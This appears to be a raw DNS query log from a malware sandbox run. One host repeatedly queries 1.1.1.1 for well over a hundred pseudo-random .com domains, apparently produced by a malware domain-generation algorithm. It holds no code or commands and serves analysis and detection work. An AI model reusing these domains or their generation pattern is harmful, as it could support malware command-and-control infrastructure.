                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741147995 CET192.168.2.91.1.1.10x9ceaStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741261005 CET192.168.2.91.1.1.10x2a07Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.741435051 CET192.168.2.91.1.1.10x8392Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744285107 CET192.168.2.91.1.1.10x9ffStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744709015 CET192.168.2.91.1.1.10xb262Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744832993 CET192.168.2.91.1.1.10x7850Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.744940996 CET192.168.2.91.1.1.10x66b9Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745057106 CET192.168.2.91.1.1.10x96e8Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745639086 CET192.168.2.91.1.1.10xfd5eStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.745755911 CET192.168.2.91.1.1.10x440cStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.374003887 CET192.168.2.91.1.1.10xa08eStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.374716043 CET192.168.2.91.1.1.10xbb2fStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.375857115 CET192.168.2.91.1.1.10x7a99Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.376441956 CET192.168.2.91.1.1.10xed72Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.418620110 CET192.168.2.91.1.1.10xbf01Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.418859005 CET192.168.2.91.1.1.10x2f09Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.425586939 CET192.168.2.91.1.1.10xbd98Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.426131010 CET192.168.2.91.1.1.10xcf5dStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.427726030 CET192.168.2.91.1.1.10x4bfeStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.428865910 CET192.168.2.91.1.1.10x319eStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.430289030 CET192.168.2.91.1.1.10x7f74Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.432332039 CET192.168.2.91.1.1.10x3339Standard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.434540987 CET192.168.2.91.1.1.10x4840Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.438990116 CET192.168.2.91.1.1.10xb5f2Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.439493895 CET192.168.2.91.1.1.10x8738Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.439718962 CET192.168.2.91.1.1.10x4daaStandard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.441971064 CET192.168.2.91.1.1.10x36c0Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.442141056 CET192.168.2.91.1.1.10xcc3fStandard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.444097042 CET192.168.2.91.1.1.10x3232Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.450906992 CET192.168.2.91.1.1.10xcff3Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451344013 CET192.168.2.91.1.1.10x1785Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451513052 CET192.168.2.91.1.1.10xe437Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451710939 CET192.168.2.91.1.1.10xaf53Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.451796055 CET192.168.2.91.1.1.10x42fbStandard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.452353001 CET192.168.2.91.1.1.10x8bacStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.457989931 CET192.168.2.91.1.1.10x3a08Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.458561897 CET192.168.2.91.1.1.10x6695Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.467171907 CET192.168.2.91.1.1.10x8297Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.468549967 CET192.168.2.91.1.1.10x2432Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.475140095 CET192.168.2.91.1.1.10xba1bStandard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.479032993 CET192.168.2.91.1.1.10x8ddfStandard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.480353117 CET192.168.2.91.1.1.10x591eStandard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.482302904 CET192.168.2.91.1.1.10xccd1Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.489458084 CET192.168.2.91.1.1.10xfa18Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.489788055 CET192.168.2.91.1.1.10xb014Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.491240978 CET192.168.2.91.1.1.10xe0ebStandard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.491647959 CET192.168.2.91.1.1.10x6a6bStandard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502266884 CET192.168.2.91.1.1.10x8ceaStandard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502456903 CET192.168.2.91.1.1.10x6df0Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502609968 CET192.168.2.91.1.1.10xcc86Standard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502763987 CET192.168.2.91.1.1.10xb76fStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.502952099 CET192.168.2.91.1.1.10x7ad7Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.503247023 CET192.168.2.91.1.1.10xd4dcStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.503408909 CET192.168.2.91.1.1.10x57cbStandard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.503556013 CET192.168.2.91.1.1.10x26b6Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.507807970 CET192.168.2.91.1.1.10xd1f7Standard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.507998943 CET192.168.2.91.1.1.10x2aa1Standard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.508450985 CET192.168.2.91.1.1.10xf27dStandard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.508723021 CET192.168.2.91.1.1.10x184Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.508903980 CET192.168.2.91.1.1.10xd0fbStandard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.509754896 CET192.168.2.91.1.1.10x39fdStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.509910107 CET192.168.2.91.1.1.10x3c17Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.512705088 CET192.168.2.91.1.1.10xfde3Standard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.515342951 CET192.168.2.91.1.1.10x39a7Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.515716076 CET192.168.2.91.1.1.10x9d35Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.516474962 CET192.168.2.91.1.1.10xc56aStandard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.516535044 CET192.168.2.91.1.1.10x5911Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.517618895 CET192.168.2.91.1.1.10xe23Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.518800974 CET192.168.2.91.1.1.10xf9d7Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.519465923 CET192.168.2.91.1.1.10xb5edStandard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.520489931 CET192.168.2.91.1.1.10xfac1Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.521716118 CET192.168.2.91.1.1.10xf19bStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.522614956 CET192.168.2.91.1.1.10xf292Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.523674011 CET192.168.2.91.1.1.10x91feStandard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.771601915 CET192.168.2.91.1.1.10x226dStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.771601915 CET192.168.2.91.1.1.10x8c6Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.774729967 CET192.168.2.91.1.1.10x623dStandard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.780899048 CET192.168.2.91.1.1.10xe5f4Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.781465054 CET192.168.2.91.1.1.10x9406Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.800108910 CET192.168.2.91.1.1.10xee49Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.800837994 CET192.168.2.91.1.1.10x7596Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.809781075 CET192.168.2.91.1.1.10x9524Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.809906006 CET192.168.2.91.1.1.10xdaStandard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.810142994 CET192.168.2.91.1.1.10xce66Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.820451975 CET192.168.2.91.1.1.10xc82cStandard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.829185963 CET192.168.2.91.1.1.10x2be6Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.830184937 CET192.168.2.91.1.1.10xc2Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.839685917 CET192.168.2.91.1.1.10xb9e7Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.840101004 CET192.168.2.91.1.1.10x609cStandard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.840908051 CET192.168.2.91.1.1.10xa669Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.850106955 CET192.168.2.91.1.1.10xae5aStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.850282907 CET192.168.2.91.1.1.10xa867Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.850627899 CET192.168.2.91.1.1.10xf7c9Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.850886106 CET192.168.2.91.1.1.10x858bStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.859339952 CET192.168.2.91.1.1.10x17b7Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.859565020 CET192.168.2.91.1.1.10xb39fStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.860428095 CET192.168.2.91.1.1.10xb5a7Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.862776041 CET192.168.2.91.1.1.10x98beStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.863038063 CET192.168.2.91.1.1.10xc1e6Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.864629030 CET192.168.2.91.1.1.10x4a50Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.865019083 CET192.168.2.91.1.1.10x7c4fStandard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.868149996 CET192.168.2.91.1.1.10x66cStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.872560024 CET192.168.2.91.1.1.10x2dd7Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.877299070 CET192.168.2.91.1.1.10x1547Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.877659082 CET192.168.2.91.1.1.10xc24Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.879757881 CET192.168.2.91.1.1.10x31baStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.882287979 CET192.168.2.91.1.1.10x581aStandard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.896749020 CET192.168.2.91.1.1.10x56ccStandard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.897192955 CET192.168.2.91.1.1.10xdf0Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.897505045 CET192.168.2.91.1.1.10x6fb4Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.897876024 CET192.168.2.91.1.1.10xdb44Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.899413109 CET192.168.2.91.1.1.10x691aStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.900230885 CET192.168.2.91.1.1.10xa0d2Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.901712894 CET192.168.2.91.1.1.10x6ebcStandard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.901910067 CET192.168.2.91.1.1.10x5df5Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.902292967 CET192.168.2.91.1.1.10x9390Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.919778109 CET192.168.2.91.1.1.10xcacaStandard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.920501947 CET192.168.2.91.1.1.10xc328Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.921056032 CET192.168.2.91.1.1.10x7caaStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.921242952 CET192.168.2.91.1.1.10x29cfStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.921572924 CET192.168.2.91.1.1.10x10e1Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.921806097 CET192.168.2.91.1.1.10x82a3Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.922193050 CET192.168.2.91.1.1.10x2f90Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.960130930 CET192.168.2.91.1.1.10x9eb8Standard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.960361958 CET192.168.2.91.1.1.10x2308Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.960542917 CET192.168.2.91.1.1.10x8bd7Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.961057901 CET192.168.2.91.1.1.10xea50Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.961258888 CET192.168.2.91.1.1.10xdb4eStandard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.961427927 CET192.168.2.91.1.1.10x4e66Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.961673975 CET192.168.2.91.1.1.10x87d8Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.961685896 CET192.168.2.91.1.1.10x6eacStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.961914062 CET192.168.2.91.1.1.10x4f1eStandard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.962132931 CET192.168.2.91.1.1.10xae50Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.962312937 CET192.168.2.91.1.1.10x212Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.962507963 CET192.168.2.91.1.1.10x67eeStandard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.962647915 CET192.168.2.91.1.1.10x49b0Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.964226961 CET192.168.2.91.1.1.10xb3fStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.965255976 CET192.168.2.91.1.1.10x9fdfStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.220266104 CET192.168.2.91.1.1.10x2bd0Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.224891901 CET192.168.2.91.1.1.10x20ecStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.225100040 CET192.168.2.91.1.1.10x8d88Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.228092909 CET192.168.2.91.1.1.10x72f7Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.228399992 CET192.168.2.91.1.1.10x15beStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.228518009 CET192.168.2.91.1.1.10xf38aStandard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.232067108 CET192.168.2.91.1.1.10xe10cStandard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.233046055 CET192.168.2.91.1.1.10x764aStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.233485937 CET192.168.2.91.1.1.10x13d3Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.244262934 CET192.168.2.91.1.1.10x78ecStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.247612000 CET192.168.2.91.1.1.10x4fe1Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.249703884 CET192.168.2.91.1.1.10x3e3eStandard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.251780987 CET192.168.2.91.1.1.10x73aaStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.260516882 CET192.168.2.91.1.1.10x271fStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.263767958 CET192.168.2.91.1.1.10x57ecStandard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.263864040 CET192.168.2.91.1.1.10xd87fStandard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264070988 CET192.168.2.91.1.1.10xaebStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264446974 CET192.168.2.91.1.1.10x9ca9Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264978886 CET192.168.2.91.1.1.10xa62bStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.264978886 CET192.168.2.91.1.1.10x96ccStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.370783091 CET192.168.2.91.1.1.10x4a71Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.372416973 CET192.168.2.91.1.1.10xc534Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.372926950 CET192.168.2.91.1.1.10xaebfStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.373224020 CET192.168.2.91.1.1.10x472cStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.373382092 CET192.168.2.91.1.1.10xb08eStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.373733044 CET192.168.2.91.1.1.10x7f84Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.374108076 CET192.168.2.91.1.1.10x85faStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.374505997 CET192.168.2.91.1.1.10xea79Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.398982048 CET192.168.2.91.1.1.10x5d6aStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.399553061 CET192.168.2.91.1.1.10x94b7Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.399825096 CET192.168.2.91.1.1.10xb227Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.399997950 CET192.168.2.91.1.1.10x917aStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.400207996 CET192.168.2.91.1.1.10x74fStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.400650978 CET192.168.2.91.1.1.10x9247Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.400871038 CET192.168.2.91.1.1.10x3963Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401118040 CET192.168.2.91.1.1.10x86f0Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401254892 CET192.168.2.91.1.1.10x7104Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401845932 CET192.168.2.91.1.1.10x1d2cStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.401845932 CET192.168.2.91.1.1.10x56f8Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.402070045 CET192.168.2.91.1.1.10x106fStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.402195930 CET192.168.2.91.1.1.10x2e80Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.403614044 CET192.168.2.91.1.1.10x7f33Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.403973103 CET192.168.2.91.1.1.10x3cfeStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.404150009 CET192.168.2.91.1.1.10x8489Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.404512882 CET192.168.2.91.1.1.10x8ab3Standard query (0)pujymel.comA (IP address)IN (0x0001)false
